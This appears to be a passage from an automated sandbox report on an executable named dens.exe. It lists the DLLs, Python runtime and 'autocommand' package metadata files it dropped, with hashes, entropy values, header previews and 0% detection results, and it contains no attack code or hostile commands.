                                                                                                                                                                                                                                            SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
                                                                                                                                                                                                                                            MD5:81AD4F91BB10900E3E2E8EAF917F42C9
                                                                                                                                                                                                                                            SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
                                                                                                                                                                                                                                            SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
                                                                                                                                                                                                                                            SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(...(...(...!...:...8...*...8...,...8... ...8...9...c..&...G...*...(...+...`...V...(.....`...)...`...)...Rich(...........................PE..d....j.f.........." ...).`Z..V........X.......................................x...........`.........................................p.r.......r...............t...............x......Cj.T....................Cj.(....Aj.@............pZ..............................text...._Z......`Z................. ..`.rdata..ZR...pZ..T...dZ.............@..@.data....+....r.......r.............@....pdata........t.......s.............@..@.reloc........x.......w.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):86016
                                                                                                                                                                                                                                            Entropy (8bit):5.958571842352702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:OwsZ607E6QFvkncm4nraT1G5YDHykXxA:o80w6QFsMWpG5YDHdXx
                                                                                                                                                                                                                                            MD5:D7193BEA71087B94502C6B3A40120B04
                                                                                                                                                                                                                                            SHA1:51AA3825A885A528356BA339F599C557E9973EC3
                                                                                                                                                                                                                                            SHA-256:886375BC6F0FF2BBD1E8280F8F1CB29C93F94B8E25B5076043CD796654C3A193
                                                                                                                                                                                                                                            SHA-512:C65CEF39362A75814D40132F4F54F25F258C484DD011B12AE7051FA52865F025C960E4A3130C699B7EB1BE375A3D2C3C3B733D6543338D7E40AAD0488D305056
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1\5.P2f.P2f.P2f.(.f.P2f./3g.P2f.(3g.P2f./7g.P2f./6g.P2f./1g.P2fK-3g.P2f.P3f/P2f..:g.P2f..2g.P2f...f.P2f..0g.P2fRich.P2f........PE..d...>.{e.........." ...%.....t............................................................`.........................................06..h....6..x............p......................@&...............................%..@...............@............................text...X........................... ..`.rdata...I.......J..................@..@.data........P.......2..............@....pdata.......p.......@..............@..@.rsrc................L..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5232408
                                                                                                                                                                                                                                            Entropy (8bit):5.940072183736028
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                                                            MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                                                            SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                                                            SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                                                            SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):792856
                                                                                                                                                                                                                                            Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                                            MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                                            SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                                            SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                                            SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):46592
                                                                                                                                                                                                                                            Entropy (8bit):5.417086235508803
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:67CE1/NMVzMoCQVbrw0k6To3OOG/B+jPSrSRNj4bSM2V:QruzMoNrNTo3OOG/eRF4be
                                                                                                                                                                                                                                            MD5:4EED96BBB1C4B6D63F50C433E9C0A16A
                                                                                                                                                                                                                                            SHA1:CDE34E8F1DAC7F4E98D2B0AAF1186C6938DE06C3
                                                                                                                                                                                                                                            SHA-256:B521B7E3B6BED424A0719C36735BC4BF2BB8B0926370B31C221C604E81F8D78B
                                                                                                                                                                                                                                            SHA-512:1CACB250D867FCBBC5224C3F66CB23A93F818BC1D0524CAD6D1C52295D243AF10F454FDE13FA58671D3EE62281A2A3F71A69F28B08FD942FCEDBA3C9B09A774A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v`.2...2...2...;y..0..."...0...yy..0..."...1..."...:..."...9...!...1...2...G...z...3...z...3...z.s.3...z...3...Rich2...................PE..d....}.f.........." ...).\...^...... `....................................................`.............................................d...$...d...............x...............,...................................P...@............p...............................text....[.......\.................. ..`.rdata...+...p...,...`..............@..@.data...."..........................@....pdata..x...........................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202008
                                                                                                                                                                                                                                            Entropy (8bit):6.369252583877094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:qwJ1l3SauVCjLwifFPYKDRW97oaU+1urfmwl1CnLiHbe7pjMeU8F5IMLhA8:73SauVCwi6KDRW97oaVybCLiS7pq8FZ
                                                                                                                                                                                                                                            MD5:8C1F876831395D146E3BCADCEA2486DD
                                                                                                                                                                                                                                            SHA1:82CBFB59F0581A0554D6A5061E1F82E6B46A3473
                                                                                                                                                                                                                                            SHA-256:D32D7722D6ED2B2780C039D63AF044554C0BA9CF6E6EFEF28EBC79CB443D2DA0
                                                                                                                                                                                                                                            SHA-512:73067BB8DCC44CD52551A48400BD8E721268DD44F9884EBB603452ECE9C7BD276D40B7CBCA4F10223F27B8CCDCD1D2EC298A1C767A691859AEA10056C108A730
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d...`b.f.........." ...(..................................................... ......gi....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):68376
                                                                                                                                                                                                                                            Entropy (8bit):6.147701397143669
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:OV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/d:ODmF61JFn+/Ob5IML0l7SySxUx
                                                                                                                                                                                                                                            MD5:5EACE36402143B0205635818363D8E57
                                                                                                                                                                                                                                            SHA1:AE7B03251A0BAC083DEC3B1802B5CA9C10132B4C
                                                                                                                                                                                                                                            SHA-256:25A39E721C26E53BEC292395D093211BBA70465280ACFA2059FA52957EC975B2
                                                                                                                                                                                                                                            SHA-512:7CB3619EA46FBAAF45ABFA3D6F29E7A5522777980E0A9D2DA021D6C68BCC380ABE38E8004E1F31D817371FB3CDD5425D4BB115CB2DC0D40D59D111A2D98B21D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.................PE..d...Ab.f.........." ...(.............................................................F....`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927640
                                                                                                                                                                                                                                            Entropy (8bit):5.765552513907485
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:mRSn173WIgXqQYRn0I+gaYFD0iRpIrCMEGXgeieBwHTuJTA8LbLH7ft4OCLj8j4V:mIn8hYEgw8Ij887GlSvBHDMiEruuln
                                                                                                                                                                                                                                            MD5:166CC2F997CBA5FC011820E6B46E8EA7
                                                                                                                                                                                                                                            SHA1:D6179213AFEA084F02566EA190202C752286CA1F
                                                                                                                                                                                                                                            SHA-256:C045B57348C21F5F810BAE60654AE39490846B487378E917595F1F95438F9546
                                                                                                                                                                                                                                            SHA-512:49D9D4DF3D7EF5737E947A56E48505A2212E05FDBCD7B83D689639728639B7FD3BE39506D7CFCB7563576EBEE879FD305370FDB203909ED9B522B894DD87AACB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d...=b.f.........." ...(..(..4B..... .........................................j......[j...`..........................................cN.d...$1O.......i......._.xI....i../... i.([....2.T.....................H.(...p.2.@............ (..............................text.....(.......(................. ..`.rdata...6'.. (..8'...(.............@..@.data....I...`O......HO.............@....pdata..xI...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc..([... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):31000
                                                                                                                                                                                                                                            Entropy (8bit):6.556986708902353
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:IyRVBC9t6Lhz64CHf2slDT90Y5IMQGCHQIYiSy1pCQFm/AM+o/8E9VF0Ny/r5n+/:LGyKHfx1H5IMQGY5YiSyv4AMxkEFNnq
                                                                                                                                                                                                                                            MD5:7C14C7BC02E47D5C8158383CB7E14124
                                                                                                                                                                                                                                            SHA1:5EE9E5968E7B5CE9E4C53A303DAC9FC8FAF98DF3
                                                                                                                                                                                                                                            SHA-256:00BD8BB6DEC8C291EC14C8DDFB2209D85F96DB02C7A3C39903803384FF3A65E5
                                                                                                                                                                                                                                            SHA-512:AF70CBDD882B923013CB47545633B1147CE45C547B8202D7555043CFA77C1DEEE8A51A2BC5F93DB4E3B9CBF7818F625CA8E3B367BFFC534E26D35F475351A77C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d...`b.f.........." ...(.....2.......................................................o....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7634
                                                                                                                                                                                                                                            Entropy (8bit):4.503638339817033
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qnJvhVL0qhYqlpIle4RrJQSqOBng4kS/cKM6b:4vjxhYWpce48engvK
                                                                                                                                                                                                                                            MD5:8466CFC6533376D42EFA6F7423F2B8E8
                                                                                                                                                                                                                                            SHA1:2BC8926FDBB07DB2AF0A8E3FF7A3BE545C8BDF6B
                                                                                                                                                                                                                                            SHA-256:ADE78D04982D69972D444A8E14A94F87A2334DD3855CC80348EA8E240AA0DF2D
                                                                                                                                                                                                                                            SHA-512:CC45DC470E107E63659B502F77E9EF44335F9427BE87639252D85181A8DEA65FA9D1B5F1BD196F782186BC61B144467888199537806A8CC15E2B462CAC0D46A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GNU LESSER GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed.... This version of the GNU Lesser General Public License incorporates.the terms and conditions of version 3 of the GNU General Public.License, supplemented by the additional permissions listed below... 0. Additional Definitions... As used herein, "this License" refers to version 3 of the GNU Lesser.General Public License, and the "GNU GPL" refers to version 3 of the GNU.General Public License... "The Library" refers to a covered work governed by this License,.other than an Application or a Combined Work as defined below... An "Application" is any work that makes use of an interface provided.by the Library, but which is not otherwise based on the Library..Defining a subclass of a class defined by the Library is de
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with very long lines (855)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15006
                                                                                                                                                                                                                                            Entropy (8bit):4.800156894367144
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:S037UxjwUbQd1Ak++k59jg8dXRNInXF2IOxcme+kQBd9Clb:d37U1LbQd1Z+3e8dhwXFacb+kQjQb
                                                                                                                                                                                                                                            MD5:542BA4FBC993C39A0BC952BE72E8717F
                                                                                                                                                                                                                                            SHA1:4310DB58F98C12B23286E5FA37F0E27ABEFB6A4A
                                                                                                                                                                                                                                            SHA-256:3800D9B91DCEEA2065A6ED6279383362E97AC38B8E56B9343F404EE531860099
                                                                                                                                                                                                                                            SHA-512:E3672EA056E5F2EFD3685C98DC0CF47E9A44F5A84DC457FC8AB31CD6DE09559C6E566D2D00F5B3CE55511E81A050DBB0DED6CF941916A6FF1019392FD96E1636
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: autocommand.Version: 2.2.2.Summary: A library to create a command-line program from a function.Home-page: https://github.com/Lucretiel/autocommand.Author: Nathan West.License: LGPLv3.Project-URL: Homepage, https://github.com/Lucretiel/autocommand.Project-URL: Bug Tracker, https://github.com/Lucretiel/autocommand/issues.Platform: any.Classifier: Development Status :: 6 - Mature.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3).Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Python: >=3.7.Description-Content-Type: text/markdown.License-File: LICENSE..[![PyPI version](https://badge.fury.io/py/autocommand.svg)](
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1308
                                                                                                                                                                                                                                            Entropy (8bit):5.721750099226425
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:kn/2zDcMvX4owkE+RlpGUttyvUMDtuH5p4D127cyOMT34:knuXNv4LkEMl0UWMF5p45AcuT34
                                                                                                                                                                                                                                            MD5:52BF4937018B88B9D28ED98A76B5E2AC
                                                                                                                                                                                                                                            SHA1:C8D5B732C154A2D4D501454647FAFEB356B93C4E
                                                                                                                                                                                                                                            SHA-256:822BBA66B41526FA547186B80221F85DA50D652BEE5493DBFE5D14085112F0C3
                                                                                                                                                                                                                                            SHA-512:30E4DEFE09FB8907166682F9A33E0F7CC0203B65113155BBEC6548A1EADF7250882AF295FF2551803703274F9F387E00439D95CBBCB63D2E04E371B94556B3EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:autocommand-2.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..autocommand-2.2.2.dist-info/LICENSE,sha256=reeNBJgtaZctREqOFKlPh6IzTdOFXMgDSOqOJAqg3y0,7634..autocommand-2.2.2.dist-info/METADATA,sha256=OADZuR3O6iBlpu1ieTgzYul6w4uOVrk0P0BO5TGGAJk,15006..autocommand-2.2.2.dist-info/RECORD,,..autocommand-2.2.2.dist-info/WHEEL,sha256=2wepM1nk4DS4eFpYrW1TTqPcoGNfHhhO_i5m4cOimbo,92..autocommand-2.2.2.dist-info/top_level.txt,sha256=AzfhgKKS8EdAwWUTSF8mgeVQbXOY9kokHB6kSqwwqu0,12..autocommand/__init__.py,sha256=zko5Rnvolvb-UXjCx_2ArPTGBWwUK5QY4LIQIKYR7As,1037..autocommand/__pycache__/__init__.cpython-312.pyc,,..autocommand/__pycache__/autoasync.cpython-312.pyc,,..autocommand/__pycache__/autocommand.cpython-312.pyc,,..autocommand/__pycache__/automain.cpython-312.pyc,,..autocommand/__pycache__/autoparse.cpython-312.pyc,,..autocommand/__pycache__/errors.cpython-312.pyc,,..autocommand/autoasync.py,sha256=AMdyrxNS4pqWJfP_xuoOcImOHWD-qT7x06wmKN1Vp-U,5680..autocommand/autoco
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlViJR4KgP+tPCCfA5S:RtBMwlVifAWBBf
                                                                                                                                                                                                                                            MD5:88F09A0EC874FD86ABCB9BC4E265B874
                                                                                                                                                                                                                                            SHA1:786AB44FFD2F5C632B4DC5C1BF4AA2E91E579A05
                                                                                                                                                                                                                                            SHA-256:DB07A93359E4E034B8785A58AD6D534EA3DCA0635F1E184EFE2E66E1C3A299BA
                                                                                                                                                                                                                                            SHA-512:7FFEF1EC782D590D2879294C2895A5A8064ECD5FE7243CF602FCCE66A8A715F64436F17CE96070B613123847EE0C18AB0AA5BC87DB13E98A792DC07DD95E4BAB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.38.4).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12
                                                                                                                                                                                                                                            Entropy (8bit):3.084962500721156
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:5EEln:aM
                                                                                                                                                                                                                                            MD5:C3FBD7931840D987F261BEBA8C77C4D2
                                                                                                                                                                                                                                            SHA1:F7EE740BCB5C39966173CC377817A157D55844F7
                                                                                                                                                                                                                                            SHA-256:0337E180A292F04740C16513485F2681E5506D7398F64A241C1EA44AAC30AAED
                                                                                                                                                                                                                                            SHA-512:E1FA2DE0EE416AE68C57A0173C82D42A8F24DDD1E5143A1B76A3743B5EC3DDF11FB3950F27469D3D8FCAC4958CE267A7321D2F888671EDD7C2E95D0F3F8F7455
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:autocommand.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
